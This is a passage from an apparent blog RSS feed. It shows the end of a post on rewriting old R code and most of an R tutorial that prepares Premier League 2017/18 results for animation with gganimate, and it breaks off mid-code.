&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Plotting&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The actual tidyverse-inspired code consists of three main sections:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Reading the data into a single data frame/tibble using &lt;code&gt;purrr::map_df()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Cleaning up the data frame using &lt;code&gt;mutate()&lt;/code&gt; and &lt;code&gt;rename()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Plotting the data using {ggplot2}&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The resulting code is similar in length&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dir_ls&lt;/span&gt;(path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;data&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# list files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_df&lt;/span&gt;(read_csv, .id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;filename&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; col_names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# read &amp;amp; combine files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(Time &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;120&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Create Time column&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rename&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Counts&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;X1&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Rename column&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(Time, Counts)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_line&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; filename)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Nicer theme&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_viridis_d&lt;/span&gt;(labels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;t = &amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;30&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Change colours&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and gives a similar (but nicer) looking graph.&lt;/p&gt;
&lt;img class="image-center" src="blog-2018-oldr-unnamed-chunk-5-1.png" style="width:500px; class:image-center"&gt;
&lt;h2 id="i-lied-about-my-code-working"&gt;I lied about my code working&lt;/h2&gt;
&lt;p&gt;Everyone who uses R knows the two common assignment operators: &lt;code&gt;&amp;lt;-&lt;/code&gt; and &lt;code&gt;=&lt;/code&gt;. These operators are (more or less, but not quite) equivalent. However, when R was first created, there was another assignment operator, the underscore &lt;code&gt;_&lt;/code&gt;. My original code actually used &lt;code&gt;_&lt;/code&gt; as the assignment operator, i.e.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;a_scan&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/time10.out&amp;#34;&lt;/span&gt;,&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;instead of&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scan&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/time10.out&amp;#34;&lt;/span&gt;,&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I can’t find when the &lt;code&gt;_&lt;/code&gt; operator was finally removed from R, but I seem to recall it was around 2005.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-from-the-turn-of-the-century/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Animating the Premier League using {gganimate}</title><link>https://www.jumpingrivers.com/blog/r-gganimate-premier-league/</link><pubDate>Sun, 02 Sep 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-gganimate-premier-league/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-gganimate-premier-league/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-gganimate-premier-league/original.gif " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Ever wonder what an evolving gif of each premier league team’s goal difference vs points would look like made in R? Look no further! Most of this is going to be setting up the data (as always) instead of actually plotting the data. To get the data into shape, we&amp;rsquo;re going to be using the {tidyverse} and {lubridate}, which you can install the usual way via &lt;code&gt;install.packages()&lt;/code&gt;. To animate the data we&amp;rsquo;ll be using the {gganimate} package. This is not on CRAN and so must be installed from GitHub, which you can do via the {devtools} package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;thomasp85/gganimate&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To get started let’s attach the relevant packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;gganimate&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We’re going to use the last full season of matches in the premier league, which was the 17/18 season. The data was sourced from &lt;a href="http://football-data.co.uk" rel="external"&gt;football-data.co.uk&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;http://www.football-data.co.uk/mmz4281/1718/E0.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(prem)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 65&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Div Date HomeTeam AwayTeam FTHG FTAG FTR HTHG HTAG HTR Referee&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 E0 11/0… Arsenal Leicest… 4 3 H 2 2 D M Dean&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 E0 12/0… Brighton Man City 0 2 A 0 0 D M Oliv…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 E0 12/0… Chelsea Burnley 2 3 A 0 3 A C Paws…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 E0 12/0… Crystal… Hudders… 0 3 A 0 2 A J Moss&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 E0 12/0… Everton Stoke 1 0 H 1 0 H N Swar…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 E0 12/0… Southam… Swansea 0 0 D 0 0 D M Jones&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 54 more variables&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We’re only interested in the date, teams, result and home/away goals. These variables come between the variables &lt;code&gt;Date&lt;/code&gt; and &lt;code&gt;FTR&lt;/code&gt;. We also need to convert &lt;code&gt;Date&lt;/code&gt; to a date object&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(Date&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;FTR) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(Date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dmy&lt;/span&gt;(Date))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
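&lt;p&gt;As a quick aside on the date conversion: the resulting dates show that the raw text is in day/month/year order, which is why &lt;code&gt;dmy()&lt;/code&gt; is the right {lubridate} parser here. Below is a minimal sketch using two made-up date strings (the object names &lt;code&gt;raw_dates&lt;/code&gt; and &lt;code&gt;parsed&lt;/code&gt; are only for illustration, they are not part of the real data)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&#34;lubridate&#34;)

# Made-up day/month/year strings, for illustration only
raw_dates = c(&#34;11/08/2017&#34;, &#34;12/08/2017&#34;)

# dmy() reads the day first, then the month, then the year
parsed = dmy(raw_dates)
parsed

# The same text read as month/day/year gives a different date
mdy(&#34;11/08/2017&#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first call gives the 11th and 12th of August 2017, whereas &lt;code&gt;mdy()&lt;/code&gt; reads the same text as the 8th of November, so it is worth checking which order your data uses.&lt;/p&gt;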
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-r-gganimate-premier-league"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="cumulative-points-per-day-per-team"&gt;Cumulative points per day per team&lt;/h2&gt;
&lt;p&gt;There’s probably a better way to do this, but here is mine. I added a column for each team onto the data then, using a for loop (I know, I’m sorry), I transferred the “H”, “A” and “D” status of the full time result into points for each team in their respective column. For you non-football heads, that’s 3 for a win, 1 for a draw and 0 for a loss.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[sort&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HomeTeam))] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt;(i &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;nrow&lt;/span&gt;(prem)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;FTR[i] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;H&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem[i, prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HomeTeam[i]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem[i, prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;AwayTeam[i]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;FTR[i] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;A&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem[i, prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;AwayTeam[i]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem[i, prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HomeTeam[i]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem[i, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;AwayTeam[i], prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HomeTeam[i])] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(prem)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 26&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Date HomeTeam AwayTeam FTHG FTAG FTR Arsenal Bournemouth&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;date&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 2017-08-11 Arsenal Leicest… 4 3 H 3 NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2017-08-12 Brighton Man City 0 2 A NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 2017-08-12 Chelsea Burnley 2 3 A NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 2017-08-12 Crystal… Hudders… 0 3 A NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 2017-08-12 Everton Stoke 1 0 H NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 2017-08-12 Southam… Swansea 0 0 D NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 18 more variables&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can see where Arsenal beat Leicester 4-3, there is a 3 in the &lt;code&gt;Arsenal&lt;/code&gt; variable. Now, it would be nice to have this data in long form, for plotting purposes later, so we’ll use &lt;code&gt;gather()&lt;/code&gt;. I then don’t want any rows with an &lt;code&gt;NA&lt;/code&gt; in the &lt;code&gt;Points&lt;/code&gt; variable, as these only occur if a team hasn&amp;rsquo;t played on that day.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_points &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(Team, Points, Arsenal&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;`West Ham`) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(Date, Team, Points) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;(Points)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;At the moment, we only have one row for each match on each day. Later, we’ll need to work out the position of each team on each day. To do this, we need the points for each team on each day, even if they didn’t play. So I’m going to create an empty data set of days and teams, join it then fill in the &lt;code&gt;NA&lt;/code&gt;’s with &lt;code&gt;0&lt;/code&gt;’s.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;empty &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(Date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Date), each &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Team &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HomeTeam),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; stringsAsFactors &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_points &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;left_join&lt;/span&gt;(empty, prem_points)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
